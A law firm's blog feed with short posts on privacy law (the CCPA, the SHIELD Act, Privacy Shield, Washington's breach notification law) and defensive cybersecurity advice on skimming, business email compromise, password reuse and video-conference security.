On August 30, 2020, the California Legislature passed AB-1281 which, if signed by Governor Newsom, will extend two key exemptions to the California Consumer Privacy Act (the “CCPA”) until January 1, 2022.  The extension of these exemptions, which will otherwise expire on January 1, 2021 without legislative or voter action, will come as welcome news to businesses as they continue to implement CCPA-compliant policies and procedures.

The two exemptions are the “employee” exemption and the “business-to-business” (“B2B”) exemption:

  • The employee exemption provides that personal information collected by a business in the employment context is mostly exempt from the CCPA provided that it is used (1) in the course of an individual’s employment, (2) to maintain an emergency contact on file, or (3) to administer benefits to another person.
  • Under the B2B exemption, personal information reflected in communications between businesses is largely exempt from the CCPA if the consumer is acting on behalf of a business and is conducting due diligence or providing or receiving a product or service.

The California Privacy Act Rights Act (“CPARA”), if approved by California voters in November, will supersede AB-1281’s extensions.  The CPARA, however, would in fact further extend these exemptions until January 1, 2023.

For more information as to the extent of these exemptions, CCPA generally, and other states’ privacy laws, please contact us.

CSG/LIFARS webinar_Cybersecurity and Data Protection Best Practices Amid COVID-19

CSG’s Michelle A. Schaap will join Ondrej Krehel, CEO and Founder of LIFARS, LLC, and Roota Almeida, CISO with Delta Dental of New Jersey and Connecticut, on Wednesday, July 29, from 3:00 – 3:45 PM EDT for a virtual discussion around strategy and best practices in the face of the current escalated legal and cyber threat landscape.

The program entitled, “Giving Diligence its Due: Timeless Strategies for Surviving Change,” will cover a range of topics including:

  • The impact of an increasingly remote workforce on compliance policies and procedures
  • The value of implementing written data protection procedures
  • How to prepare for due diligence questionnaires
  • Cybersecurity frameworks to help ensure compliance with current regulations

To register for this program, please visit the event website.

Today, July 16, 2020, the Court of Justice1 invalidated Privacy Shield as a means to self-certify that a business is securely and appropriately protecting personal data when transferring such data from the EU to the United States. In part, the Court found that the Privacy Shield did not adequately ensure individuals’ audit rights or appropriate recourse, and therefore, the Court invalidated Privacy Shield, effective immediately. There is no grace period

This same court invalidated the Safe Harbor in 2015, and Privacy Shield then replaced that Safe Harbor.

This ruling impacts more than 5,000 companies that incurred the time and expense to self-certify under Privacy Shield. Continue Reading No More Safe Harbor… Take Two: Immediate Invalidation of Privacy Shield

The FBI issued an alert warning of an attack targeting e-commerce websites.  The bad actors are embedding code directly into the e-commerce site to then skim account information.

The notice, found here, provides the details of this attack.

As always, the best defense against this and other cyberattacks is to have layers of defenses and proactive policies and procedures in place, including:

  • Patching systems, including operating systems, software and third party-sourced code
    • Patching systems includes ensuring that your remote work force is keeping their devices touching the company’s environment patched, too
  • Keep anti-virus and anti-malware up to date
    • Remote staff members should be accessing the company’s environment through a secure VPN
  • Disable extensions and functions within your site that are not being used

Also, remember that less is more:  If you have inactive accounts, consider removing these from your live, connected and operating environments and, instead, retain that data only in off-line archives.  Further, review your data destruction policies, and delete old and/or superseded account information.

Other best practices for e-retailers include:

  • Remind customers to use robust passwords
  • Direct customers to not use the same password for multiple accounts
  • Remind remotely working employees to not use the same device for work access as family members use to game, visit school sites and/or visit other e-commerce sites

Be alert, be aware and be secure.

You are in a fantasy football league registered under your email and your password.  Unbeknownst to you, however, the leagues site has been breached, and access credentials have been stolen.  The site discovers the breach, investigates the breach, and gives notice to impacted individuals.

If you are lucky, the time frame from when the original breach occurred and when you receive notice is 60 days;  more likely it will be a longer time frame – potentially 18 months or longer.  In the meantime, because you reuse your password for multiple accounts, the bad actor that compromised the fantasy league site has already used your password to access your Gmail or AOL account, reset your password, and has logged into your bank account and drained your funds.

Sound like a bad made-for-TV movie or detective show episode?

Sadly, the scenario outlined above is true and happened to a gentleman in Texas, and was shared during a recent InfraGard¹ webinar. Continue Reading The Life of a Data Breach: The “Gift” That Keeps on Giving

The “kill chain” is a phrase that refers to the FBI’s ability to interrupt or kill the miswiring and loss of funds.

This is an extremely powerful resource given that cyber criminals have been targeting entities that use Microsoft Office 365 and Google G Suite to perpetuate business email compromise (BEC) scams.  The “phish kits” used for this particular attack enables the bad actor to mimic the otherwise legitimate cloud based email to compromise accounts and lure victims into sending or misdirecting funds. This scam has been used over the past 5 years by cyber criminals targeting Microsoft 365 and Google G Suite to steal more than $2.1 billion dollars.

If any of your clients are fooled by a spoofed email, phish or link and miswire funds, if they notify the FBI within 48 hours (sometimes as long as 72 hours, but the sooner the better chance of success) there is a strong probability (not guaranteed) that the FBI can recapture some, if not all, of the funds, but the party that sent the funds must alert the FBI within this window for any chance of success.

We do recommend that impacted companies make contact through our office so that we can be certain information gets to the right agents at the FBI ASAP.

While we always recommend a strong defensive posture – including training of personnel, processes for approval and verification of any requested wiring of funds, and other appropriate measures – even with vigilant personnel, good people are being fooled.

Please contact us to discuss training for your personnel, developing, reviewing and/or improving your processes, and to make introductions for you with your local FBI agents before you need to call them to activate the kill chain.

Even if your business is based on the East Coast, you are likely to feel the effects of the California Consumer Privacy Act (“CCPA”), which will be effective January 1, 2020.

CCPA applies to for-profit businesses that:

  • Do business in the state of California; collect, or contract with a vendor for the collection of, personal information of “consumers[1]”; and determine the means or purpose of processing the data and
    • Have annual gross revenues in excess of $25,000,000 OR
    • Buy, receive, sell or share information about 50,000 or more consumers, households or devices for commercial purposes OR
    • Derive more than half of their revenue from selling consumers’ personal information.

So… if you are not doing business in California, or you do not fall into one of the sub-categories enumerated above, why do you need to worry about CCPA? Continue Reading Not in California? Here’s Why the CCPA Should Still Be on Your Radar

States continue to pass legislation addressing the protection and breach of private information and, on July 25, 2019, New York joined the growing trend when Governor Andrew Cuomo signed the Stop Hacks and Improve Electronic Data Security Act (or “SHIELD Act”) into law.  The SHIELD Act significantly amends New York’s data protection and data breach notification laws – expanding their reach beyond businesses operating in New York and imposing new requirements on persons and businesses in possession of New York residents’ private information.

Effective March 2020, the proactive portion of the SHIELD Act will:

  • Apply to any business that has personal information (“PI”) regarding any New York resident
  • Require those businesses to adopt proactive measures to safeguard that PI
  • Require businesses to vet vendors entrusted with or with access to that PI

The amendments to the current New York breach notification law, effective on October 23, 2019, “redefine a “breach” to include the “mere” unauthorized access to PI (expand the law beyond the actual acquisition of such PI without authorization).

While the amendment to the breach notification requirements may not greatly impact businesses’ current practices, the proactive requirements will be felt by any business that is not already taking “reasonable” measures to safeguard PI in their control.  And if you are a vendor to any of these businesses, and you are not prepared to adopt the requisite proactive measures to protect PI entrusted to you, then you may lose that business. Continue Reading The Long Reach of New York’s SHIELD Act

After 9/11, many companies restricted corporate travel and began embracing online conferencing resources – whether by telephone, video or otherwise.

Now, Webex, Zoom and other similar services are bringing people into the same (virtual) room to facilitate collaboration and negotiation without leaving the comfort of their office or home.

These tools are time saving and effective – but they must be used with privacy and security in mind.

A few thoughts worth considering:

  • When selecting a provider, make sure that the provider offers security controls and password protection – and then use those protections before launching the application
  • When sending a calendar invite to attendees, do NOT include the leader pin!  Doing so would allow others to use your service
  • If you are recording your session, consider whether other attendees would be offended if they did not know they were being recorded
  • If you are sharing your screen, be VERY mindful of what else may “pop up” on that screen – outside attendees should not be able to view ANY other aspect of your activities
  • If you are using a video/webcam feature, consider what else may be viewed by other attendees
    • Is there a white board behind you that lists current projects?
    • Could someone walk behind you, not knowing you were on a video chat, and put you in an awkward situation – during one video conference I participated in, an attendee’s significant other walked by in underwear…
  • Be careful when you send the invitation that your email did not “autofill” the address of attendees such that someone joined your call who has nothing to do with the project at hand – and may not be part of your organization
  • Do not take unrelated calls while on a video chat – even if you are on mute others can see you are not paying attention and you never know who can read lips
  • Make sure the resource you are using – whether Webex, Zoom or otherwise – is secure.
  • If multiple parties are on a call, and then you wish to speak to “your side,” do not stay on the same bridge.  Circulate a new dial in just for your team to ensure no persons from the “other side” stayed on to hear the ensuing strategy or evaluation discussion.

Note that the NJCCIC (New Jersey’s Cyber Communication Resource) advised that earlier this year researchers discovered a vulnerability in WebEx, Zoom and other online conferencing products.  APIs (or Application Programming Interfaces) were used to capture meeting IDs to access meetings and possibly maintain access for an extended period of time.  Cisco and Zoom issued an alert to its users as to security measures that users can take to secure their conferences.

As with any technology, video conferencing is a wonderful tool, but should be used wisely to ensure that only those you intend are able to participate, and see and hear only relevant information.

In the continuing void at the federal level, more and more states are being proactive in adopting legislation that seeks to protect US residents’ personal data, and to impose stricter guidelines on companies that experience a data breach.

Although Washington State did not pass its previously pending bill that would have been more stringent on data controllers and processors than the looming Consumer Privacy Act of California, Washington did adopt new terms for its breach notification statute.  Effective as of March 2020, a “breach” requiring notice will include unauthorized access, disclosure, alteration and/or compromise of biometric and/or health data (previously excluded from the definition of personal information). Further, the window in which the entity suffering a breach must give notice has been reduced from 45 days to 30 days.

Many states, including New Jersey, New York, Florida, and Texas, have either adopted or are considering proactive legislation that will require those controlling and/or processing personal data to take “reasonable” measures to protect that data while under that entity’s control.

Without a consistent definition of “personal information,” what constitutes a “breach,” and what are “reasonable” measures, it is challenging for businesses to prepare.  That said, businesses that fail to take “some” measure to protect data will likely find themselves subject to liability even without its jurisdiction having in place proactive legislation. As discussed in the Dittman case, a data breach is a “foreseeable risk” against which companies have a “common law duty” to protect personal data.

Resources are available to help companies to take steps toward being “reasonable” in collecting, receiving, storing, processing, sharing and destroying data.  Looking for those resources is the first step toward being a responsible data controller and processor.  In New Jersey, the NJCCIC offers insights weekly into the latest threats.  NIST has frameworks for small and midsize businesses, as well as for larger entities.  SANS has forms that serve as useful starting points for developing policies and procedures.  The process can be done, but it can no longer be ignored.

For guidance on how to begin, please contact our offices.